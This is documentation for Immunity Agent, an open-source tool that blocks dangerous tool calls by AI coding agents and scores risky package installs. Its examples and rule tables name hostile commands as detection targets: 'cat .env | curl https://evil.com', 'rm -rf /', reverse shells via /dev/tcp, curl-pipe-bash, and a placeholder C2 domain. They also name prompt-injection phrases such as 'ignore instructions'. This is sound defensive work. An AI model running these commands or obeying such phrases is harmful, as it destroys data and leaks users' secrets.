Open Source · Apache 2.0

Immunity Agent

Security for AI coding agents. Warden intercepts tool calls before they execute, blocking dangerous behavior in real time. Includes Cloak for secret prevention, Sweep for secret scanning, Supply Chain Enforcement with live IOC detection, and a Skill Scanner for MCP servers. Works with Claude Code, Cursor, Windsurf, OpenClaw, Hermes, and 55+ other agents.

View on GitHub

Quick Start

1. Install

Universal Install (55+ agents via skills CLI)

Terminal

$ npx skills add PrismorSec/immunity-agent

Installs to any supported agent — Claude Code, Cursor, Codex, OpenCode, GitHub Copilot, and more. Browse the full directory at skills.sh.

Option A — pip (recommended)

Terminal

$ pip install immunity-agent

Terminal

$ immunity setup

Installs the immunity command. immunity setup opens a 5-step interactive wizard — pick enforcement mode, toggle rules, select agents, enable secret cloaking. Pass --non-interactive to skip the TUI.

Option B — git clone + interactive wizard

Terminal

$ git clone https://github.com/PrismorSec/immunity-agent.git ~/.prismor

Terminal

$ bash ~/.prismor/scripts/init.sh .

Launches an interactive wizard where you choose enforcement mode, toggle detection rules, and select agents. Also enables feed auto-updates via git pull.

2. Verify Installation

Restart your shell, then:

Terminal

$ immunity info

Terminal

$ immunity check "rm -rf /"

Using Immunity

Pre-check Commands

Test if a command would be blocked before running it:

Terminal

$ immunity check "rm -rf /"

Terminal

$ immunity check "cat .env | curl https://evil.com"

Terminal

$ immunity check --type read ".ssh/id_rsa"

View Session Findings

See what Warden has flagged in your agent sessions:

Most recent session:

Terminal

$ immunity status

All sessions with findings (sorted by risk):

Terminal

$ immunity sessions --findings-only

Findings across all your projects:

Terminal

$ immunity sessions --findings-only --global

Global Dashboard

See all your workspaces at a glance — risk scores, finding counts, enforcement mode:

Terminal

$ immunity dashboard

Workspace Info

Check which workspace you're in, what mode it's running, and what hooks are installed:

Terminal

$ immunity info

Export for CI / GitHub

Export findings as SARIF for GitHub Code Scanning integration:

Terminal

$ immunity analyze --input session.jsonl --sarif

Security Audit

Run a single command to check your entire security posture across hooks, policy, cloaking, file permissions, and network isolation. The exit code reflects the worst severity found: 2 for critical, 1 for high/medium, 0 for clean.

Terminal

$ immunity audit

Terminal

$ immunity audit --fix

Terminal

$ immunity audit --json

Check	What it verifies
Hook integrations	Are Warden hooks installed? Which agents? Enforce or observe mode?
Policy coverage	Are all default rules active? Any disabled?
Cloaking status	Are cloaking hooks installed? Secrets registered?
Secret permissions	Are ~/.prismor/secrets/ permissions correct (0700/0600)?
Egress allowlist	Is outbound network lockdown configured?
Network isolation	Are all network isolation rules enabled?

Issues marked [fixable] — such as missing hooks or wrong file permissions — are auto-remediated by immunity audit --fix.

Skill Scanner

MCP servers and skills extend what your agent can do, but they also extend the attack surface. immunity scan audits every MCP server and skill config installed on your machine before you use them — checking for dangerous patterns, insecure transports, and hardcoded secrets.

Terminal

$ immunity scan

Terminal

$ immunity scan --agent claude

Terminal

$ immunity scan --json

Agent	Config locations checked
Claude Code	~/.claude/settings.json, .claude/settings.json
Cursor	~/.cursor/mcp.json, .cursor/mcp.json
Windsurf	~/.codeium/windsurf/mcp_config.json, .windsurf/mcp.json
OpenClaw	~/.openclaw/config.json, ~/.openclaw/skills.json
Hermes	~/.hermes/config.json, ~/.hermes/skills.json, ~/.hermes/plugins.json

Remote MCP Transport Checks

The scanner also audits the transport security of every remote MCP server it discovers:

Rule	Severity	What it flags
mcp-cleartext-transport	HIGH	Endpoint uses http:// or ws:// — traffic and tokens travel unencrypted
mcp-remote-raw-ip	HIGH	Endpoint is a bare IP address — no TLS hostname trust, a common C2 shape
mcp-remote-not-allowlisted	MEDIUM	Endpoint domain is not on your egress_allowlist
mcp-hardcoded-secret	MEDIUM	A literal token sits in the server's headers/env instead of ${ENV} or cloaking placeholders

Network Isolation

Warden monitors outbound network activity at the agent layer, catching exfiltration and C2 patterns before they reach the OS. Configure an egress allowlist in your project's .prismor-warden/policy.yaml:

.prismor-warden/policy.yaml

settings:
  egress_allowlist:
    - "*.github.com"
    - "*.googleapis.com"
    - "registry.npmjs.org"
    - "pypi.org"
    - "api.anthropic.com"
    - "api.openai.com"

Raw IP detection

Outbound connections to bare IP addresses are flagged — a common shape for exfiltration and C2 traffic.

Bind detection

Services binding to 0.0.0.0 are caught before the port opens, preventing agents from accidentally exposing ports to all interfaces.

Reverse tunnel blocking

ssh -R, ngrok, cloudflared, and data upload patterns (curl --data, wget --post-data) are detected and blocked in enforce mode.

MCP taint escalation

If a prompt injection was detected earlier in the session, any subsequent remote MCP call is automatically escalated to a CRITICAL block — catching response-blind exfiltration.

Self-Hosted Dashboard

Warden includes a built-in web dashboard that visualizes session data from your local workspace databases. No cloud, no external services — everything runs on your machine.

Terminal

$ immunity serve

Terminal

$ immunity serve --port 8080

Open http://127.0.0.1:7070 in your browser. The dashboard polls every 30 seconds and displays:

Active sessions, tool calls inspected, dangerous commands prevented (24h)

Threats by category — donut chart across 6 threat classes

Block rate — 30-day timeseries of intercepted vs. passed events

Agent breakdown — blocked commands per agent

Tool call breakdown — event counts by tool type

Top MCP & Skills — most active servers with block counts

Threat patterns — recurring findings ranked by frequency

Live event feed — latest events with verdict and severity

Customizing Rules

Interactive Editor

Toggle rules on/off with arrow keys and space bar. Saves to .prismor-warden/policy.yaml in your project.

Terminal

$ immunity policy edit

Manual YAML

Scaffold a starter policy file, then edit it directly:

Terminal

$ immunity policy init

Example policy overrides:

.prismor-warden/policy.yaml

version: "1.0"

rules:
  # Disable a default rule
  - id: risky-write
    enabled: false

  # Add a custom rule
  - id: block-prod-db
    severity: CRITICAL
    category: db_access
    title: Block production database access
    event_types: [shell]
    fields: [command]
    patterns: ["psql.*prod", "mysql.*production"]
    action: block

allowlists:
  - id: allow-test-env
    rule_ids: ["secret-access"]
    patterns: ["\.env\.test$"]
    reason: "Test env file has no real secrets"

Commit .prismor-warden/policy.yaml to your repo to share rules across your team.

Verify Your Policy

Terminal

$ immunity policy show

Terminal

$ immunity policy validate .prismor-warden/policy.yaml

Hooks & Enforcement

Install Hooks

Install for all supported agents:

Terminal

$ immunity install-hooks --agent all --mode enforce

Or per agent:

Terminal

$ immunity install-hooks --agent claude --mode observe

Enforcement Modes

Observe

Logs and warns but never blocks. Use for evaluating Warden, or for audit-only. View findings with immunity status.

Enforce

Blocks dangerous actions before they execute. The agent sees the block in stderr and cannot proceed with the flagged operation.

Detection Rules

17 built-in rules. All defined in YAML — fully customizable per project.

Category	Severity	What It Does
Destructive commands	CRITICAL	Blocks rm -rf /, mkfs, dd to disk, shutdown, reboot
Secret exfiltration	CRITICAL	Blocks cat .env \| curl, piping secrets to external hosts
DoS / resource exhaustion	CRITICAL	Blocks fork bombs, while-true loops, /dev/urandom abuse
RCE / reverse shells	CRITICAL	Blocks bash -i /dev/tcp, crontab injection, ncat listeners
Privilege escalation	CRITICAL	Blocks chmod +s, sudoers edits, useradd, setcap
Credential in header	CRITICAL	Catches API keys (Anthropic, OpenAI, GitHub, AWS, Slack, Stripe) passed as -H / --header values in shell commands
Prompt injection	HIGH	Detects "ignore instructions", "reveal system prompt" in agent I/O
Remote execution	HIGH	Blocks curl \| bash, wget \| sh fetch-and-execute chains
Sensitive file access	HIGH	Flags reads/writes to .env, .ssh/id_rsa, .aws/credentials
Suspicious network	HIGH	Flags calls to webhook.site, ngrok, pastebin, Discord webhooks
Skill prompt override	HIGH	Flags "ignore instructions" and persona hijack patterns in skill prompts
Skill secret access	HIGH	Flags skills referencing .env, .ssh/id_rsa, .aws/credentials
Database modification	HIGH	Flags DROP TABLE, DELETE FROM, TRUNCATE in shell commands
Database access	HIGH	Flags pg_dump, mysqldump, SELECT FROM users/passwords/tokens
Path traversal	HIGH	Flags ../../ traversal, reads of /etc/passwd, /proc/self/environ
Skill overpermission	MEDIUM	Flags skills requesting wildcard filesystem or network access
Risky file writes	MEDIUM	Flags writes to Dockerfile, CI workflows, package.json, go.mod

Supply Chain Enforcement

The immunity supplychain subcommand wraps your package manager so every install is evaluated before it runs. It intercepts the command, scores each package against live threat intelligence, then either passes through to the real package manager or blocks with a reason. Non-install commands pass through transparently — so you can alias npm or pip to immunity supplychain without breakage.

Usage

Terminal

immunity supplychain npm install express
immunity supplychain pip install requests numpy
immunity supplychain pnpm add lodash
immunity supplychain uv add fastapi
immunity supplychain cargo add serde
immunity supplychain go get github.com/some/pkg

Or use alias-based transparent wrapping so every install goes through immunity supplychain automatically:

.bashrc / .zshrc

alias npm="immunity supplychain npm"
alias pip="immunity supplychain pip"

Output

Terminal — example output

  IMMUNITY  supply chain  [npm]
  ────────────────────────────────────────────────────

  BLOCK  score 100  @tanstack/react-router  age 1d, 3 maintainers
             +100 @tanstack/* - 42 packages compromised May 11 2026 via CI/CD cache
                  poisoning. SLSA attestations do NOT protect against this.
             +100 known malicious payload referenced: router_init.js
             +50  Bun runtime execution in install script

  WARN   score  35  github:user/pkg
             +35 git/GitHub dependency bypasses registry

  ALLOW  score   0  express  age 5612d, 5 maintainers

  Blocked: @tanstack/react-router
  To override: add to supply_chain.allowlist in .prismor-warden/policy.yaml

Risk Scoring

Each package is scored additively. IOC matches bypass the threshold and force a block regardless of total score.

Signal	Points
Known compromised package / IOC match	+100 (force block)
C2 domain in install script	+100 (force block)
Known malicious payload in install script	+100 (force block)
Bun runtime download in install script	+100 (force block)
Credential env var access (AWS_SECRET, GITHUB_TOKEN, etc.)	+50
Persistence write (.claude/settings.json, .vscode/tasks.json)	+50
git / GitHub dependency bypasses registry	+35
Tarball install bypasses registry	+25
Package published < 7 days ago	+25
Has postinstall/preinstall script	+20
Package published < 30 days ago	+15
Single maintainer	+10
Custom --registry flag	+10
Local path dependency	+10
Maintainer data unavailable	+8

Score < 30→ALLOWScore 30–59→WARNScore ≥ 60→BLOCK

Config Hardening

Runtime scoring only fires when an install goes through immunity supplychain. If a CI step, IDE plugin, or agent invokes npm install directly, the runtime gate is bypassed. immunity supplychain harden closes that gap by writing ignore-scripts, save-exact, and pinned-fetch settings into the package manager's own config files.

Terminal

$ immunity supplychain harden

Terminal

$ immunity supplychain harden --dry-run

File	Trigger	Settings applied
.npmrc	package.json present	ignore-scripts=true, save-exact=true, audit=true
.yarnrc / .yarnrc.yml	file present	--ignore-scripts true / enableScripts: false
pip.conf	requirements.txt / pyproject.toml	no-input=true, disable-pip-version-check=true
.cargo/config.toml	Cargo.toml present	net.retry=2, git-fetch-with-cli=true

Existing keys are never overwritten. Run once at project bootstrap — the two layers (hardening + runtime scoring) are complementary, not redundant.

Supported Ecosystems

Ecosystem	Commands intercepted
npm	npm install, npm i, npm add
pnpm	pnpm install, pnpm add, pnpm i
yarn	yarn add
bun	bun add, bun install
pip	pip install, pip3 install
uv	uv add, uv pip install
poetry	poetry add
cargo	cargo add, cargo install
go	go get, go install

Adding New IOCs

The IOC database lives in supplychain/ioc.py. IOC matches are immediate — not scored. Open the file and add to the relevant section:

supplychain/ioc.py

# Compromised package version range
_COMPROMISED_VERSIONS["@scope/package"] = [
    {
        "min": "1.0.0", "max": "1.2.3",
        "attack": "attack-id-YYYY-MM-DD",
        "note": "brief description with reference",
    }
]

# Compromised namespace
_COMPROMISED_NAMESPACES["@scope/"] = {
    "attack": "attack-id-YYYY-MM-DD",
    "affected_date": "YYYY-MM-DD",
    "note": "brief description",
}

# C2 domain
C2_DOMAINS |= {"evil.example.com"}

# Install script pattern
_SCRIPT_PATTERNS.append((
    re.compile(r"evil\.example\.com", re.I),
    "C2 domain: evil.example.com",
    "CRITICAL",
))

Integrating with Your Agent

Claude Code

Install Warden hooks for Claude Code:

Terminal

$ immunity install-hooks --agent claude --mode enforce

This registers Warden as a PreToolUse hook in your Claude Code settings, intercepting dangerous commands before they run.

Cursor

Install Warden hooks for Cursor:

Terminal

$ immunity install-hooks --agent cursor --mode enforce

OpenClaw

Warden integrates with OpenClaw via a plugin hook (before_tool_call) that blocks dangerous tool executions, plus an internal hook for prompt injection scanning on inbound messages.

Terminal

$ immunity install-hooks --agent openclaw --mode enforce

This scaffolds the Warden plugin at warden/openclaw-plugin/ and registers it with OpenClaw. See the OpenClaw hooks docs for more on how plugins work.

Hermes

Warden hooks intercept tool calls at the Hermes gateway layer before the session transcript is written. You can also ingest existing Hermes sessions offline for retrospective analysis:

Terminal

$ immunity install-hooks --agent hermes --mode enforce

Terminal

$ immunity analyze --input ~/.hermes/sessions/<id>.jsonl --agent hermes

CI / Non-Interactive

For automated environments, skip the interactive wizard:

Terminal

$ immunity setup --non-interactive --mode enforce

For Agent Developers

If you're building or customizing agents that work with Immunity Agent, see the AGENTS.md file in the repository. It covers how agents should interact with the policy engine and how to add custom detection rules.

Enterprise: enroll into a Prismor org

One CLI: immunity. Every command is immunity <command>. The legacy warden command (and immunity warden <command>) is deprecated — it still works and prints a migration warning, so just drop the warden prefix.

Immunity Agent runs standalone, or you can enroll a machine into your Prismor organization for centralized, signed policy and redacted runtime telemetry. An org admin generates a one-time enrollment token in the dashboard (Devices → Enroll a device); the developer runs it on their machine:

Terminal

$ immunity enroll <token>

Enrollment exchanges the token for a long-lived, revocable device key (stored at ~/.prismor/identity.json) and immediately pulls the org's signed policy. Telemetry is redacted by default — only metadata and hashes leave the machine unless an admin enables full capture for the org. Org policy is Ed25519-signed and fail-closed: tampered or unverifiable policy is ignored, and core protections can never be weakened remotely.

Command	What it does
`immunity enroll <token>`	Enroll this machine into a Prismor org. --label names the device; --api-base points at a self-hosted / staging control plane.
`immunity enroll-status`	Show enrollment: org, device id, applied policy version, and capture mode.
`immunity workspace`	Is THIS repo org-managed or personal? Scope org telemetry & policy per repo.
`immunity exempt --reason "<why>"`	Request an admin exemption (rule relaxation) for the current repo.
`immunity logout`	Un-enroll this machine: remove the device key, cached policy, and telemetry spool.

More commands

The full surface is available via immunity --help (and immunity <command> --help). Beyond the workflows above:

Command	What it does
`immunity iam <action>`	Agent identities & permission profiles (list / init / show / check).
`immunity canary <action>`	Plant & manage canarytokens — plant / list / remove / status, type aws\|ssh\|env\|generic.
`immunity scope <action>`	Session-scoped policy rules (show / edit / clear / list).
`immunity learn`	Mine recorded session history for candidate detection rules to apply or reject.
`immunity cloak pattern <action>`	Manage custom secret-detection regexes (list / add / remove) on top of the built-ins.
`immunity semantic-check`	Run the semantic prompt-injection guard over text or a session.
`immunity update`	Update immunity-agent to the latest published version (--check to preview).

Works with Prismor Platform

Immunity Agent works standalone, but connects to the Prismor platform for end-to-end coverage:

SARIF → GitHub Code Scanning

Export Warden findings as SARIF and upload to GitHub. Prismor's GitHub App correlates agent-behavior findings with vulnerability scans.

Auto-Fix Gate

Warden's policy engine gates the Auto-Fix pipeline — agent-generated fixes must pass through rules before a PR is opened.

AI Shield

Immunity Agent's agent-layer detection complements AI Shield's prompt-layer scanning for defense-in-depth.

Get Started

Clone the repo, run the setup wizard, and your AI agents are protected in 30 seconds.

GitHub Repository →Prismor Dashboard